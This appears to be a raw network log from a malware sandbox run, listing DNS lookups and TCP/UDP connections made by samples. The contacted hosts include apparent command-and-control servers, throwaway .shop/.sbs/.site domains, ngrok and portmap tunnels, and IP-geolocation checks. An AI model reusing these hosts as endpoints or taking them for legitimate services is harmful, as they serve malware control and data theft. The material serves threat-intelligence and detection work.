US 8.8.8.8:53 85.99.22.2.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 marshal-zhukov.com udp
US 172.67.160.80:443 marshal-zhukov.com tcp
US 8.8.8.8:53 80.160.67.172.in-addr.arpa udp
N/A 192.168.100.18:4782 tcp
US 137.184.144.245:4782 tcp
US 64.190.113.79:443 tcp
TM 91.202.233.141:80 91.202.233.141 tcp
US 8.8.8.8:53 141.233.202.91.in-addr.arpa udp
US 64.190.113.79:443 tcp
RU 185.215.113.66:80 185.215.113.66 tcp
RU 185.215.113.36:80 185.215.113.36 tcp
US 8.8.8.8:53 thicktoys.sbs udp
US 8.8.8.8:53 fleez-inc.sbs udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 pull-trucker.sbs udp
US 8.8.8.8:53 3xc1aimbl0w.sbs udp
US 8.8.8.8:53 36.113.215.185.in-addr.arpa udp
FR 176.150.119.15:56001 tcp
US 8.8.8.8:53 bored-light.sbs udp
US 8.8.8.8:53 300snails.sbs udp
US 8.8.8.8:53 faintbl0w.sbs udp
US 8.8.8.8:53 crib-endanger.sbs udp
US 208.95.112.1:80 ip-api.com tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 2.22.99.85:443 steamcommunity.com tcp
TH 45.141.26.170:80 45.141.26.170 tcp
US 8.8.8.8:53 marshal-zhukov.com udp
US 172.67.160.80:443 marshal-zhukov.com tcp
US 8.8.8.8:53 www.update.microsoft.com udp
US 20.72.235.82:80 www.update.microsoft.com tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 170.26.141.45.in-addr.arpa udp
US 8.8.8.8:53 82.235.72.20.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
SY 5.134.254.142:40500 tcp
UZ 213.230.108.92:40500 udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 8.8.8.8:53 92.108.230.213.in-addr.arpa udp
SG 35.185.187.24:80 35.185.187.24 tcp
US 8.8.8.8:53 24.187.185.35.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 64.190.113.79:443 tcp
IR 188.215.221.55:40500 udp
US 8.8.8.8:53 55.221.215.188.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
MX 189.167.44.219:40500 udp
TH 45.141.26.170:7000 tcp
US 8.8.8.8:53 219.44.167.189.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 reinforcenh.shop udp
N/A 192.168.100.18:4782 tcp
US 137.184.144.245:4782 tcp
US 8.8.8.8:53 gutterydhowi.shop udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 ghostreedmnu.shop udp
US 8.8.8.8:53 offensivedzvju.shop udp
US 8.8.8.8:53 vozmeatillu.shop udp
IR 91.185.146.150:40500 udp
US 8.8.8.8:53 150.146.185.91.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 drawzhotdog.shop udp
US 8.8.8.8:53 twizthash.net udp
RU 185.215.113.66:5152 twizthash.net tcp
US 8.8.8.8:53 fragnantbui.shop udp
US 8.8.8.8:53 stogeneratmns.shop udp
US 8.8.8.8:53 reinforcenh.shop udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 2.22.99.85:443 steamcommunity.com tcp
FR 176.150.119.15:56001 tcp
MX 189.133.11.24:40500 udp
US 8.8.8.8:53 24.11.133.189.in-addr.arpa udp
US 8.8.8.8:53 300snails.sbs udp
US 8.8.8.8:53 thicktoys.sbs udp
US 8.8.8.8:53 fleez-inc.sbs udp
US 8.8.8.8:53 pull-trucker.sbs udp
US 8.8.8.8:53 3xc1aimbl0w.sbs udp
US 8.8.8.8:53 bored-light.sbs udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 faintbl0w.sbs udp
US 8.8.8.8:53 crib-endanger.sbs udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 64.190.113.79:443 tcp
UZ 213.206.44.35:40500 udp
US 8.8.8.8:53 35.44.206.213.in-addr.arpa udp
UZ 213.230.99.119:40500 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
DE 85.10.193.220:80 tcp
UZ 195.158.22.4:40500 udp
US 8.8.8.8:53 220.193.10.85.in-addr.arpa udp
US 8.8.8.8:53 4.22.158.195.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
UZ 213.230.97.138:40500 udp
US 8.8.8.8:53 138.97.230.213.in-addr.arpa udp
N/A 192.168.100.18:4782 tcp
US 64.190.113.79:443 tcp
US 137.184.144.245:4782 tcp
US 64.190.113.79:443 tcp
UZ 90.156.163.33:40500 udp
US 8.8.8.8:53 33.163.156.90.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
KZ 89.218.186.142:40500 udp
US 8.8.8.8:53 142.186.218.89.in-addr.arpa udp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
RU 93.123.145.179:40500 udp
US 8.8.8.8:53 179.145.123.93.in-addr.arpa udp
US 64.190.113.79:443 tcp
EG 62.114.143.56:40500 tcp
US 64.190.113.79:443 tcp
UZ 89.249.62.14:40500 udp
US 8.8.8.8:53 14.62.249.89.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
IR 2.179.117.33:40500 udp
N/A 192.168.100.18:4782 tcp
US 8.8.8.8:53 33.117.179.2.in-addr.arpa udp
US 137.184.144.245:4782 tcp
KZ 5.63.94.144:40500 udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 144.94.63.5.in-addr.arpa udp
UZ 90.156.164.28:40500 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
UZ 89.249.62.94:40500 udp
US 8.8.8.8:53 94.62.249.89.in-addr.arpa udp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 home.sevkk17vt.top udp
US 64.190.113.79:443 tcp
MX 189.136.17.247:40500 udp
US 8.8.8.8:53 247.17.136.189.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
UZ 89.236.218.158:40500 udp
US 8.8.8.8:53 158.218.236.89.in-addr.arpa udp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 64.190.113.79:443 tcp
RU 37.78.33.95:40500 udp
US 8.8.8.8:53 95.33.78.37.in-addr.arpa udp
US 137.184.144.245:4782 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
RU 185.215.113.206:80 185.215.113.206 tcp
KZ 178.91.28.42:40500 udp
US 8.8.8.8:53 206.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 42.28.91.178.in-addr.arpa udp
US 64.190.113.79:443 tcp
MX 201.138.180.213:40500 tcp
YE 46.35.84.77:40500 udp
US 8.8.8.8:53 property-imper.sbs udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 frogs-severz.sbs udp
US 8.8.8.8:53 occupy-blushi.sbs udp
US 8.8.8.8:53 blade-govern.sbs udp
US 104.21.80.208:443 blade-govern.sbs tcp
US 8.8.8.8:53 77.84.35.46.in-addr.arpa udp
US 8.8.8.8:53 208.80.21.104.in-addr.arpa udp
US 8.8.8.8:53 story-tense-faz.sbs udp
US 104.21.1.25:443 story-tense-faz.sbs tcp
US 8.8.8.8:53 leg-sate-boat.sbs udp
US 8.8.8.8:53 disobey-curly.sbs udp
US 104.21.70.128:443 disobey-curly.sbs tcp
US 8.8.8.8:53 25.1.21.104.in-addr.arpa udp
US 8.8.8.8:53 motion-treesz.sbs udp
US 104.21.94.231:443 motion-treesz.sbs tcp
US 8.8.8.8:53 powerful-avoids.sbs udp
US 172.67.187.4:443 powerful-avoids.sbs tcp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 128.70.21.104.in-addr.arpa udp
US 8.8.8.8:53 231.94.21.104.in-addr.arpa udp
US 8.8.8.8:53 4.187.67.172.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 172.67.160.80:443 marshal-zhukov.com tcp
KZ 37.151.73.50:40500 udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 50.73.151.37.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
KZ 95.59.171.222:40500 udp
US 8.8.8.8:53 222.171.59.95.in-addr.arpa udp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 64.190.113.79:443 tcp
IR 2.185.189.167:40500 udp
US 137.184.144.245:4782 tcp
US 8.8.8.8:53 167.189.185.2.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 property-imper.sbs udp
US 8.8.8.8:53 frogs-severz.sbs udp
US 8.8.8.8:53 occupy-blushi.sbs udp
US 64.190.113.79:443 tcp
US 104.21.80.208:443 blade-govern.sbs tcp
UZ 90.156.161.82:40500 udp
US 104.21.1.25:443 story-tense-faz.sbs tcp
US 8.8.8.8:53 leg-sate-boat.sbs udp
US 104.21.70.128:443 disobey-curly.sbs tcp
US 8.8.8.8:53 82.161.156.90.in-addr.arpa udp
US 104.21.94.231:443 motion-treesz.sbs tcp
US 172.67.187.4:443 powerful-avoids.sbs tcp
US 64.190.113.79:443 tcp
GB 2.22.99.85:443 steamcommunity.com tcp
US 172.67.160.80:443 marshal-zhukov.com tcp
IR 2.176.94.43:40500 tcp
US 64.190.113.79:443 tcp
KZ 89.218.244.178:40500 udp
US 8.8.8.8:53 178.244.218.89.in-addr.arpa udp
US 64.190.113.79:443 tcp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
EG 197.121.126.87:40500 udp
US 8.8.8.8:53 87.126.121.197.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
KZ 92.46.228.246:40500 udp
US 8.8.8.8:53 246.228.46.92.in-addr.arpa udp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 64.190.113.79:443 tcp
IR 185.71.153.146:40500 udp
US 137.184.144.245:4782 tcp
US 8.8.8.8:53 146.153.71.185.in-addr.arpa udp
US 64.190.113.79:443 tcp
PK 39.48.235.83:40500 udp
US 8.8.8.8:53 83.235.48.39.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
KZ 213.211.105.70:40500 udp
UZ 90.156.163.123:40500 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 70.105.211.213.in-addr.arpa udp
US 64.190.113.79:443 tcp
FR 176.150.119.15:56001 tcp
KZ 89.218.186.86:40500 udp
US 8.8.8.8:53 86.186.218.89.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
UZ 90.156.162.106:40500 udp
US 8.8.8.8:53 106.162.156.90.in-addr.arpa udp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 64.190.113.79:443 tcp
MX 187.230.224.82:40500 udp
US 137.184.144.245:4782 tcp
US 8.8.8.8:53 82.224.230.187.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
YE 46.161.239.195:40500 udp
US 8.8.8.8:53 195.239.161.46.in-addr.arpa udp
IR 5.202.242.190:40500 tcp
IR 151.232.179.149:40500 udp
US 8.8.8.8:53 149.179.232.151.in-addr.arpa udp
US 64.190.113.79:443 tcp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
UZ 213.230.69.230:40500 udp
US 8.8.8.8:53 230.69.230.213.in-addr.arpa udp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 137.184.144.245:4782 tcp
SY 77.44.150.37:40500 udp
US 8.8.8.8:53 37.150.44.77.in-addr.arpa udp
NE 41.138.38.164:40500 udp
US 8.8.8.8:53 164.38.138.41.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
AM 109.68.122.14:40500 udp
US 8.8.8.8:53 14.122.68.109.in-addr.arpa udp
US 64.190.113.79:443 tcp
DE 159.100.18.229:40500 tcp
US 8.8.8.8:53 229.18.100.159.in-addr.arpa udp
US 64.190.113.79:443 tcp
UZ 89.236.216.14:40500 udp
US 8.8.8.8:53 14.216.236.89.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 209.80.50.20.in-addr.arpa udp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
BG 146.70.53.161:40500 udp
US 8.8.8.8:53 161.53.70.146.in-addr.arpa udp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 64.190.113.79:443 tcp
US 137.184.144.245:4782 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
RU 31.8.29.135:40500 tcp
YE 178.130.103.42:40500 udp
US 8.8.8.8:53 42.103.130.178.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
UZ 213.230.126.169:40500 udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 169.126.230.213.in-addr.arpa udp
US 64.190.113.79:443 tcp
CN 8.130.42.227:10001 tcp
US 64.190.113.79:443 tcp
KZ 2.133.45.6:40500 udp
US 8.8.8.8:53 6.45.133.2.in-addr.arpa udp
US 64.190.113.79:443 tcp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
UZ 93.188.86.253:40500 udp
US 8.8.8.8:53 253.86.188.93.in-addr.arpa udp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 137.184.144.245:4782 tcp
US 64.190.113.79:443 tcp
YE 134.35.100.89:40500 udp
US 8.8.8.8:53 89.100.35.134.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
TM 91.202.233.141:80 91.202.233.141 tcp
SY 77.44.228.98:40500 tcp
EG 45.241.38.203:40500 udp
US 8.8.8.8:53 203.38.241.45.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 cdn.ly.9377.com udp
GB 79.133.176.200:80 cdn.ly.9377.com tcp
N/A 192.168.1.13:5555 tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 200.176.133.79.in-addr.arpa udp
CN 183.57.21.131:8095 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 client.9377.com udp
CN 120.79.30.240:80 client.9377.com tcp
US 64.190.113.79:443 tcp
RU 185.215.113.66:80 twizthash.net tcp
RU 185.215.113.66:80 twizthash.net tcp
US 64.190.113.79:443 tcp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 64.190.113.79:443 tcp
US 137.184.144.245:4782 tcp
RU 185.215.113.66:80 twizthash.net tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
RU 185.215.113.66:80 twizthash.net tcp
US 20.83.148.22:8080 20.83.148.22 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 22.148.83.20.in-addr.arpa udp
CN 120.76.203.28:80 client.9377.com tcp
RU 185.215.113.217:80 185.215.113.217 tcp
US 64.190.113.79:443 tcp
US 20.83.148.22:80 170.114.78.80 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 www.python.org udp
US 151.101.128.223:443 www.python.org tcp
RU 185.215.113.66:80 twizthash.net tcp
US 8.8.8.8:53 223.128.101.151.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
FR 176.150.119.15:56001 tcp
TM 91.202.233.141:80 91.202.233.141 tcp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 137.184.144.245:4782 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 64.190.113.79:443 tcp
CN 112.74.95.85:8888 tcp
US 8.8.8.8:53 blasterrysbio.cyou udp
US 8.8.8.8:53 worddosofrm.shop udp
US 8.8.8.8:53 mutterissuen.shop udp
US 8.8.8.8:53 standartedby.shop udp
US 8.8.8.8:53 nightybinybz.shop udp
US 8.8.8.8:53 conceszustyb.shop udp
US 8.8.8.8:53 bakedstusteeb.shop udp
US 8.8.8.8:53 respectabosiz.shop udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 moutheventushz.shop udp
US 8.8.8.8:53 thizx13vt.top udp
US 8.8.8.8:53 steamcommunity.com udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 172.67.160.80:443 marshal-zhukov.com tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 www.update.microsoft.com udp
US 20.109.209.108:80 www.update.microsoft.com tcp
US 8.8.8.8:53 108.209.109.20.in-addr.arpa udp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 www.y2126.com udp
UZ 94.141.68.56:40500 udp
KZ 95.58.91.70:40500 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 56.68.141.94.in-addr.arpa udp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
KR 123.214.186.171:40500 udp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp
US 8.8.8.8:53 171.186.214.123.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
US 20.83.148.22:80 170.114.78.80 tcp
GE 62.212.36.229:40500 udp
CN 183.57.21.131:8095 tcp
US 8.8.8.8:53 229.36.212.62.in-addr.arpa udp
N/A 192.168.100.18:4782 tcp
FR 176.150.119.15:56001 tcp
US 8.8.8.8:53 tmpfiles.org udp
US 172.67.195.247:443 tmpfiles.org tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 rentry.co udp
US 104.26.2.16:443 rentry.co tcp
US 137.184.144.245:4782 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 8.8.8.8:53 247.195.67.172.in-addr.arpa udp
US 8.8.8.8:53 16.2.26.104.in-addr.arpa udp
US 64.190.113.79:443 tcp
TJ 109.74.69.43:40500 udp
US 8.8.8.8:53 43.69.74.109.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
KZ 92.47.143.122:40500 udp
US 8.8.8.8:53 122.143.47.92.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
YE 46.161.239.195:40500 udp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
SY 82.137.239.235:40500 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
CI 160.155.209.135:40500 udp
US 8.8.8.8:53 135.209.155.160.in-addr.arpa udp
US 64.190.113.79:443 tcp
TH 154.197.69.165:80 154.197.69.165 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 165.69.197.154.in-addr.arpa udp
US 8.8.8.8:53 jZFqZYoOtpryMyRHD.jZFqZYoOtpryMyRHD udp
TR 85.103.235.188:40500 udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 188.235.103.85.in-addr.arpa udp
CN 111.231.145.137:8888 tcp
N/A 192.168.100.18:4782 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 137.184.144.245:4782 tcp
HU 38.180.109.140:20007 tcp
US 64.190.113.79:443 tcp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
SY 95.212.18.228:40500 udp
US 8.8.8.8:53 228.18.212.95.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 thizx13vt.top udp
US 20.83.148.22:80 170.114.78.80 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
HU 38.180.109.140:20007 tcp
US 64.190.113.79:443 tcp
KZ 5.251.234.88:40500 udp
US 8.8.8.8:53 88.234.251.5.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
TH 154.197.69.165:7000 tcp
US 64.190.113.79:443 tcp
UZ 213.230.99.184:40500 udp
US 8.8.8.8:53 184.99.230.213.in-addr.arpa udp
US 64.190.113.79:443 tcp
IR 2.181.30.194:40500 tcp
US 8.8.8.8:53 thizx13vt.top udp
HU 38.180.109.140:20007 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 215.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 xred.mooo.com udp
US 8.8.8.8:53 freedns.afraid.org udp
US 69.42.215.252:80 freedns.afraid.org tcp
N/A 224.0.0.251:5353 udp
YE 94.26.219.44:40500 udp
US 8.8.8.8:53 252.215.42.69.in-addr.arpa udp
US 8.8.8.8:53 44.219.26.94.in-addr.arpa udp
US 64.190.113.79:443 tcp
CN 47.115.166.43:80 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
HU 38.180.109.140:20007 tcp
MX 187.230.224.82:40500 udp
IR 46.100.82.131:40500 tcp
N/A 192.168.100.18:4782 tcp
US 137.184.144.245:4782 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
FR 176.150.119.15:56001 tcp
US 8.8.8.8:53 thizx13vt.top udp
KZ 5.63.94.144:40500 udp
US 64.190.113.79:443 tcp
HU 38.180.109.140:20007 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
UZ 89.236.216.14:40500 udp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
IR 5.232.126.125:40500 udp
US 8.8.8.8:53 125.126.232.5.in-addr.arpa udp
HU 38.180.109.140:20007 tcp
US 8.8.8.8:53 thizx13vt.top udp
RU 185.215.113.217:80 185.215.113.217 tcp
US 64.190.113.79:443 tcp
US 20.83.148.22:80 170.114.78.80 tcp
US 64.190.113.79:443 tcp
IR 94.183.35.46:40500 udp
US 8.8.8.8:53 46.35.183.94.in-addr.arpa udp
US 64.190.113.79:443 tcp
HU 38.180.109.140:20007 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
MX 189.167.5.148:40500 udp
US 20.83.148.22:8080 20.83.148.22 tcp
US 8.8.8.8:53 148.5.167.189.in-addr.arpa udp
US 137.184.144.245:4782 tcp
SA 193.122.74.238:1337 193.122.74.238 tcp
PK 182.188.65.58:40500 tcp
US 64.190.113.79:443 tcp
US 20.83.148.22:8080 20.83.148.22 tcp
US 8.8.8.8:53 238.74.122.193.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 www.teknoarge.com udp
TR 31.145.124.122:80 www.teknoarge.com tcp
US 8.8.8.8:53 122.124.145.31.in-addr.arpa udp
FR 176.150.119.15:56001 tcp
US 8.8.8.8:53 thizx13vt.top udp
UZ 87.237.236.86:40500 udp
US 8.8.8.8:53 86.236.237.87.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 20.83.148.22:80 www.zillow.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
HU 38.180.109.140:20007 tcp
US 64.190.113.79:443 tcp
RU 193.233.48.194:80 193.233.48.194 tcp
US 8.8.8.8:53 roaddrermncomplai.shop udp
US 8.8.8.8:53 racedsuitreow.shop udp
US 8.8.8.8:53 defenddsouneuw.shop udp
US 8.8.8.8:53 deallyharvenw.shop udp
US 8.8.8.8:53 priooozekw.shop udp
US 8.8.8.8:53 pumpkinkwquo.shop udp
US 8.8.8.8:53 abortinoiwiam.shop udp
US 8.8.8.8:53 surroundeocw.shop udp
US 8.8.8.8:53 covvercilverow.shop udp
US 8.8.8.8:53 steamcommunity.com udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 194.48.233.193.in-addr.arpa udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 8.8.8.8:53 marshal-zhukov.com udp
RU 185.215.113.36:80 185.215.113.36 tcp
US 172.67.160.80:443 marshal-zhukov.com tcp
IN 59.91.192.115:40500 udp
US 8.8.8.8:53 115.192.91.59.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
TR 31.145.124.122:443 www.teknoarge.com tcp
RU 185.215.113.66:80 twizthash.net tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 loeghaiofiehfihf.to udp
RU 185.215.113.66:80 loeghaiofiehfihf.to tcp
HU 38.180.109.140:20007 tcp
GB 89.197.154.115:80 89.197.154.115 tcp
US 8.8.8.8:53 115.154.197.89.in-addr.arpa udp
US 64.190.113.79:443 tcp
GB 89.197.154.115:7700 tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
DE 52.57.120.10:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 10.120.57.52.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 8.8.8.8:53 delaylacedmn.site udp
US 8.8.8.8:53 famikyjdiag.site udp
US 8.8.8.8:53 possiwreeste.site udp
US 8.8.8.8:53 commandejorsk.site udp
US 8.8.8.8:53 underlinemdsj.site udp
US 8.8.8.8:53 bellykmrebk.site udp
US 8.8.8.8:53 agentyanlark.site udp
US 8.8.8.8:53 writekdmsnu.site udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 dez345-37245.portmap.host udp
PK 202.70.150.106:40500 udp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 106.150.70.202.in-addr.arpa udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
US 172.67.160.80:443 marshal-zhukov.com tcp
DE 3.78.28.71:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 aiiaiafrzrueuedur.net udp
RU 185.215.113.66:80 aiiaiafrzrueuedur.net tcp
HU 38.180.109.140:20007 tcp
US 8.8.8.8:53 71.28.78.3.in-addr.arpa udp
US 64.190.113.79:443 tcp
CN 183.57.21.131:8095 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 8.8.8.8:53 wrappyskmwio.store udp
US 8.8.8.8:53 questionsmw.store udp
US 8.8.8.8:53 soldiefieop.site udp
US 8.8.8.8:53 abnomalrkmu.site udp
US 8.8.8.8:53 chorusarorp.site udp
US 8.8.8.8:53 treatynreit.site udp
US 8.8.8.8:53 snarlypagowo.site udp
US 8.8.8.8:53 mysterisop.site udp
US 8.8.8.8:53 absorptioniw.site udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 8.8.8.8:53 egorepetiiiosn.shop udp
US 8.8.8.8:53 shelterryujxo.shop udp
US 8.8.8.8:53 chequedxmznp.shop udp
US 8.8.8.8:53 illnesmunxkza.shop udp
US 8.8.8.8:53 triallyforwhgh.shop udp
N/A 192.168.100.18:4782 tcp
US 8.8.8.8:53 shootydowtqosm.shop udp
US 8.8.8.8:53 faceddullinhs.shop udp
US 8.8.8.8:53 ammycanedpors.shop udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 64.190.113.79:443 tcp
IR 2.177.40.206:40500 udp
US 137.184.144.245:4782 tcp
US 8.8.8.8:53 206.40.177.2.in-addr.arpa udp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 64.190.113.79:443 tcp
US 20.83.148.22:80 170.114.78.80 tcp
YE 46.35.79.193:40500 tcp
US 8.8.8.8:53 123.198.153.18.in-addr.arpa udp
US 8.8.8.8:53 docs.google.com udp
GB 142.250.187.206:443 docs.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 thizx13vt.top udp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.200.3:80 o.pki.goog tcp
HU 38.180.109.140:20007 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 225.179.250.142.in-addr.arpa udp
IR 2.191.61.218:40500 udp
US 8.8.8.8:53 218.61.191.2.in-addr.arpa udp
FR 176.150.119.15:56001 tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 0.tcp.in.ngrok.io udp
US 64.190.113.79:443 tcp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
IR 2.189.31.47:40500 udp
US 8.8.8.8:53 47.31.189.2.in-addr.arpa udp
US 8.8.8.8:53 mundoparachicas.space udp
US 172.67.199.148:443 mundoparachicas.space tcp
US 64.190.113.79:443 tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 148.199.67.172.in-addr.arpa udp
HU 38.180.109.140:20007 tcp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
